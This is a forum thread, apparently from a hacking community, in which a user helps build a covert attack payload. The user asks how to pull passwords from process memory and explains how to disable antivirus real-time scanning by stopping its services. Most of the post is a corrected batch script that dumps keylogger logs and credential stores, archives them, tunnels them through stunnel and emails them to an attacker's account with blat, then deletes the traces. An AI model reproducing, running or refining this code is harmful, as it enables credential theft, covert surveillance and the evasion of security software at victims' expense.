hacked_13

hey, i was hoping to get a few ideas or suggestions on the matter. With ahk files when you compile them you can make them with a password. But when they are executed as an exe, they are of course loaded into memory, and are then executed. As with all exe processes. My one question is does anyone know of a program or memory scanner where i could use it to get the data from memory. Ta. Or if anyone has other ideas, feel free to contribute.

arrr yes good old year 10. i just finished my y12. like last exam forever!! gl man, and its not the be all and end all

Hey man cool work, i just had a brain wave, Okay to be honest we are not going to do a 3 second configure when we are about to attack a computer. We are going to set up the payload the day/night before using a comp which more than likely we have .Net Framework installed. (no attack intended @DMilton) Okay, Could you add the profiles. Like having a drop down box or radio buttons where you can choose a profile. This you could easily write into your own config. with a something simple like this LSA Secrets,0,1,1, IE,0,1,1, SAM,1,1,1, Where "name","profile1","profile2","profile3", Cause that would 1 minimise space. and could easily be loaded at startup of the program. Happy Coding!

Just a small extra note, i do know that you can't kill Zone Alarm (zlclient.exe) And i also know that Avast (newest version) now does a pop up when its about to close, it makes an overlay on your whole screen saying it has picked up a kill code more or less and whether you want it to continue. What i have found in past versions of Norton and the latest version of Trend Micro. Is that instead of attacking the AV process it self is that you actually Stop the service(s). I know in Trend for a fact, that you can Stop then turn the service to Manual for the Real Time Scanner. But i dont know what will happen if they have a scheduled virus scan. (But sersiously tho, i would say 90% of people trust their Real Time Scanner, and always stop the scheduled scan anyway) Just some notes for thinking :)

Re wrote my crappy post Okay now ive officially read all 34 pages.. rawr!! i am king. lol anyway. Couple of things, love your work leapo. (can't spell and im too tired) great idea. I also think i know the problems in the sending of information over the Gmail accounts. ill post new send. files. Also in the start.bat script it also doesn't actually call the right file anyway.... I think this is due to you change the files because you have not actually finished writing that part of the code. Or i could be wrong. in the start.bat. Anyway i do know what im talkin about in the sending part. Keylog In Send.bat GOTO setvariables :sendfiles :: Dump logs pssuspend winlogon.exe Recover.exe pssuspend -r winlogon.exe :: Selects where to grab logs from if exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO AdminRights if not exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO TryAlternate :TryAlternate if exist %appdata%\klgr\winlogon.exe GOTO Recover if not exist %appdata%\klgr\winlogon.exe GOTO NoRights ::If admin rights are found, email logs this way :AdminRights :: Archive log in 1MB chunks rar a %computername%keylog.rar %systemroot%\keylog.txt -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel for %%i in (%systemroot%\%computername%keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup ::If adminrights are not found, email logs this way :NoRights :: Archive log in 1MB chunks rar a keylog.rar %appdata%\keylog.txt -v1024k -vn stunnel-4.11.exe -install -quiet net start stunnel for %%i in (%appdata%\keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup :Cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents rmdir /s /q docs ::Not sure what ^^ line does cause there should not be a docs folder due to the no hacksaw... :: Delete archive ::For Admin Rights del /q /f %systemroot%\%computername%keylog.r*.* ::For No Admin Rights del /q /f %appdata%\keylog.r*.* GOTO end :setvariables This is only minor clean up code and the bold computer name part. You weren't actually sending anything... That should "theoretically" fix the sending of the Keylogs. The Hacksaw sending is Fine But i dont have an awesome deal of knowledge of cmd to understand the NMAP one. NMAP send_partial GOTO Setvariables :sendfiles so i gather that :sendfiles means that it is defining that when you say later to go to This point. which is wrong.. cause you already define it later on: :sendfiles for %%i in (%computername%.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099 GOTO cleanup So defining it twice i believe would make windows chuck a hissy :D (I think.. correct me if im wrong) So unless i am wrong (which i prob will be) by getting rid of the first ":sendfiles" it SHould fix it. as well as: send_partial for nmap :cleanup :: Stop stunnel rem taskkill /f /im stunnel-4.11.exe (??) net stop stunnel stunnel-4.11.exe -uninstall -quiet :: Delete documents :: Delete archive rmdir /s /q %systemroot%\$NtUninstallKB91338$ GOTO end you were actually deleting the wrong folder and not the archives. oo now i get it. But yes. you forgot the 8. Just small fixes :D Also add under ::Delete documents "del /q /f %computername%.* Now the Nmap SHOULD send, as well as the keylogger as long as it makes the logs correctly and in C:\ or wherev its mean to be. Hope these actually work. Im in the process of installing xp. (stupid shit os.....takes to long) on a virtual machine. So yeah. then i was going to try it :D Just thinking now as i was reading over it...that it does a 3 part send and 3 part clean up... fk it im still posting. :P